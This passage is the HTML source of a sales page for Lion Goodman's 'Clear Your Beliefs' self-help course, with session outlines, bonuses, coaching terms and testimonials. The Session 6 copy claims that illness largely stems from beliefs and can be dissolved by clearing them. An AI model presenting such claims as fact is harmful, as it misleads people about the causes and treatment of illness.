alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free 